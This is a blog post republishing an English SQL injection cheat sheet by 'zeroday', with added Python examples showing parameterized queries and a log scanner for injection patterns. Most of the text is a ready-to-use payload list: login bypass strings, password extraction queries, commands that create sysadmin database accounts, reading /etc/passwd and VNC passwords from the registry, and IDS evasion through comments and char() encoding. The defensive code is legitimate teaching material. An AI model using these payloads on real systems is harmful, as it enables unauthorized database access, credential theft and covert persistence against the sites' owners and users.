Application Security: SQL Injection Techniques


Below is an introduction to a topic on the application-security side, which is also one of the security considerations when checking an application's robustness. What follows is a foreign author's summary of SQL injection techniques; after reading it you should have a fairly comprehensive understanding of injection. It is an English-language technical write-up. I personally tend to read English technical articles, partly to train my own ability to read technical documentation, and I also recommend that everyone read some technical material in English. It is not about "worshipping everything foreign"; some of the things the "big names" abroad have summarized are genuinely worth learning from and sharing. I hope the content below helps those who have blind spots in this area (the English is fairly simple, and anyone with basic computer English should have no trouble reading it, so I will not translate it here; reading more English documentation can only help):

SQL Injection Paper

By zeroday.

zeroday [ at ] blacksecurity.org

1. Introduction.

2. Testing for vulnerabilities.

3. Gathering Information.

4. Data types.

5. Grabbing Passwords.

6. Create DB accounts.

7. MySQL OS Interaction.

8. Server name and config.

9. Retrieving VNC password from registry.

10. IDS Signature Evasion.

11. MySQL Input Validation Circumvention using Char().

12. IDS Signature Evasion using comments.

13. Strings without quotes.

1. When a box only has port 80 open, it's almost certain the admin will patch his server,

so the best thing to turn to is web attacks. SQL Injection is one of the most common web attacks.

You attack the web application (ASP, JSP, PHP, CGI, etc.) rather than the webserver

or the services running on the OS.

SQL injection is a way to trick the application by supplying a query or command as input via web pages;

most websites take parameters from the user like username and password or even their emails.

They all use SQL queries.

2. First off, you should start with something simple.

- Login:' or 1=1--

- Pass:' or 1=1--

- http://website/index.asp?id=' or 1=1--

These are simple ways to try; other ones are:

- ' having 1=1--

- ' group by userid having 1=1--

- ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')--

- ' union select sum(columnname) from tablename--
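As an added illustration (not part of zeroday's paper or of this blog post), the following Python/sqlite3 snippet builds the kind of login query that the `' or 1=1--` payload above defeats, beside the parameterized form that is the standard fix. The `users` table, its rows and the function names are constructed for this example; the defensive point is that bound parameters are never parsed as SQL, so the same input is simply a login name that does not exist.

```python
import sqlite3


def make_db():
    """Constructed in-memory sample database (not from the original paper)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (login, password) VALUES (?, ?)",
        [("admin", "s3cret-admin"), ("alice", "alice-pw")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, login, password):
    """Builds the query by string concatenation: the pattern the paper attacks.

    With login = "' or 1=1--" the WHERE clause becomes
    login = '' or 1=1 (the rest is commented out), so every row matches.
    """
    sql = (
        "SELECT login FROM users WHERE login = '" + login
        + "' AND password = '" + password + "'"
    )
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, login, password):
    """Same logic with bound parameters: user input is data, never SQL text."""
    sql = "SELECT login FROM users WHERE login = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (login, password))]


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1--"
    print("vulnerable   :", login_vulnerable(db, payload, "anything"))
    print("parameterized:", login_parameterized(db, payload, "anything"))
    print("legit user   :", login_parameterized(db, "alice", "alice-pw"))
```

Run as a script it prints both users for the concatenated query and an empty list for the parameterized one; the second function is also the only one that still returns exactly one row for a genuine login. Note that sqlite3 treats `--` as a line comment just as MS SQL Server does, which is why the tautology works unchanged here.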

3. Gathering Information.

- ' or 1 in (select @@version)--

- ' union all select @@version--

Those will find the actual version of the server, OS/service pack.

4. Data types.

Oracle

-->SYS.USER_OBJECTS (USEROBJECTS)

-->SYS.USER_VIEWS

-->SYS.USER_TABLES

-->SYS.USER_TAB_COLUMNS

-->SYS.USER_CATALOG

-->SYS.USER_TRIGGERS

-->SYS.ALL_TABLES

-->SYS.TAB

MySQL

-->mysql.user

-->mysql.host

-->mysql.db

MS access

-->MsysACEs

-->MsysObjects

-->MsysQueries

-->MsysRelationships

MS SQL Server

-->sysobjects

-->syscolumns

-->systypes

-->sysdatabases

5. Grabbing passwords

'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --

' and 1 in (select var from temp)--

' ; drop table temp --

6. Create DB accounts.

MS SQL

exec sp_addlogin 'name' , 'password'

exec sp_addsrvrolemember 'name', 'sysadmin'

MySQL

INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))

Access

CREATE USER name IDENTIFIED BY 'pass123'

Postgres (requires Unix account)

CREATE USER name WITH PASSWORD 'pass123'

Oracle

CREATE USER name IDENTIFIED BY pass123

TEMPORARY TABLESPACE temp

DEFAULT TABLESPACE users;

GRANT CONNECT TO name;

GRANT RESOURCE TO name;

7. MySQL OS Interaction

- ' union select 1,load_file('/etc/passwd'),1,1,1;

8. Server name and config.

- ' and 1 in (select @@servername)--

- ' and 1 in (select servername from master.sysservers)--

9. Retrieving VNC password from registry.

- '; declare @out binary(8)

- exec master..xp_regread

- @rootkey = 'HKEY_LOCAL_MACHINE',

- @key = 'SOFTWARE\ORL\WinVNC3\Default',

- @value_name='password',

- @value = @out output

- select cast (@out as bigint) as x into TEMP--

- ' and 1 in (select cast(x as varchar) from temp)--

10. IDS Signature Evasion.

Evading ' OR 1=1 Signature

- ' OR 'unusual' = 'unusual'

- ' OR 'something' = 'some'+'thing'

- ' OR 'text' = N'text'

- ' OR 'something' like 'some%'

- ' OR 2 > 1

- ' OR 'text' > 't'

- ' OR 'whatever' in ('whatever')

- ' OR 2 BETWEEN 1 and 3

11. MySQL Input Validation Circumvention using Char().

Inject without quotes (string = "%"):

--> ' or username like char(37);

Inject with quotes (string = "root"):

--> ' union select * from users where login = char(114,111,111,116);

Load files in unions (string = "/etc/passwd"):

--> ' union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;

Check for existing files (string = "n.ext"):

--> ' and 1=(if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));

12. IDS Signature Evasion using comments.

-->'/**/OR/**/1/**/=/**/1

-->Username:' or 1/*

-->Password:*/=1--

-->UNI/**/ON SEL/**/ECT

-->(Oracle) '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' ||'ER'

-->(MS SQL) '; EXEC ('SEL' + 'ECT US' + 'ER')
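Sections 10 and 12 make the same point from the attacker's side: a detector that matches the literal string `' OR 1=1` misses the comment-padded and rewritten forms. The following added example (my own code, not from zeroday's paper or this blog) shows the defensive consequence: signatures have to be applied after decoding and normalizing the parameter, and even then expression-based rewrites such as `'some'+'thing'` slip through, so detection complements parameterized queries rather than replacing them. The log lines are constructed for this example in a simplified `METHOD PATH?QUERY PROTO` format; the payloads inside them are the ones listed in sections 10 and 12.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request log lines (not from the original paper).
# Payloads are URL-encoded the way a web server would log them.
SAMPLE_LOG = [
    "GET /index.asp?id=1 HTTP/1.1",
    "GET /index.asp?id=%27%20or%201%3D1-- HTTP/1.1",
    "GET /index.asp?id=%27/**/OR/**/1/**/%3D/**/1 HTTP/1.1",
    "GET /index.asp?id=%27%20OR%20%27unusual%27%20%3D%20%27unusual%27 HTTP/1.1",
    "GET /index.asp?id=UNI/**/ON%20SEL/**/ECT HTTP/1.1",
    "GET /index.asp?id=%27%20OR%20%27something%27%20%3D%20%27some%27%2B%27thing%27 HTTP/1.1",
]

COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
WS_RE = re.compile(r"\s+")

# Rules run on the normalized value rather than on a fixed literal:
#  - tautology: OR <literal> = <same literal>, e.g. OR 1=1, OR 'x' = 'x'
#  - union-select: UNION ... SELECT anywhere in the value
RULES = [
    ("tautology", re.compile(r"\bOR\s+('[^']*'|\d+)\s*=\s*\1", re.I)),
    ("union-select", re.compile(r"\bUNION\b.*\bSELECT\b", re.I | re.S)),
]


def extract_params(line):
    """Return the decoded parameter values from one constructed log line."""
    path = line.split(" ")[1]
    query = path.partition("?")[2]
    return [unquote_plus(kv.partition("=")[2]) for kv in query.split("&") if kv]


def normalize_variants(value):
    """Two normalizations of one value.

    MySQL treats /**/ as whitespace, so the first variant replaces comments
    with a space; the second deletes them, which is what recombines the
    split keywords of section 12 (UNI/**/ON -> UNION).
    """
    variants = []
    for replacement in (" ", ""):
        v = COMMENT_RE.sub(replacement, value)
        v = WS_RE.sub(" ", v).strip()
        variants.append(v)
    return variants


def check_value(value):
    """Names of the rules that fire on any normalized form of the value."""
    hits = []
    for name, rx in RULES:
        if any(rx.search(v) for v in normalize_variants(value)):
            hits.append(name)
    return hits


def scan_log(lines):
    """Per line, the sorted list of rule names that fired on its parameters."""
    return [
        sorted({hit for param in extract_params(line) for hit in check_value(param)})
        for line in lines
    ]


if __name__ == "__main__":
    for line, hits in zip(SAMPLE_LOG, scan_log(SAMPLE_LOG)):
        print(hits or ["clean"], line)
```

Against the sample log the comment-padded `'/**/OR/**/1/**/=/**/1` and the split `UNI/**/ON SEL/**/ECT` are both flagged once comments are normalized, and `' OR 'unusual' = 'unusual'` is caught because the rule compares the two sides of the comparison instead of looking for `1=1`. The last line, `' OR 'something' = 'some'+'thing'`, is not flagged: deciding that the two sides are equal would require evaluating SQL expressions, which is exactly the work a signature-based IDS cannot do, and why the application-level fix (bound parameters) is the control that actually closes the hole.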

13. Strings without quotes.

-->INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)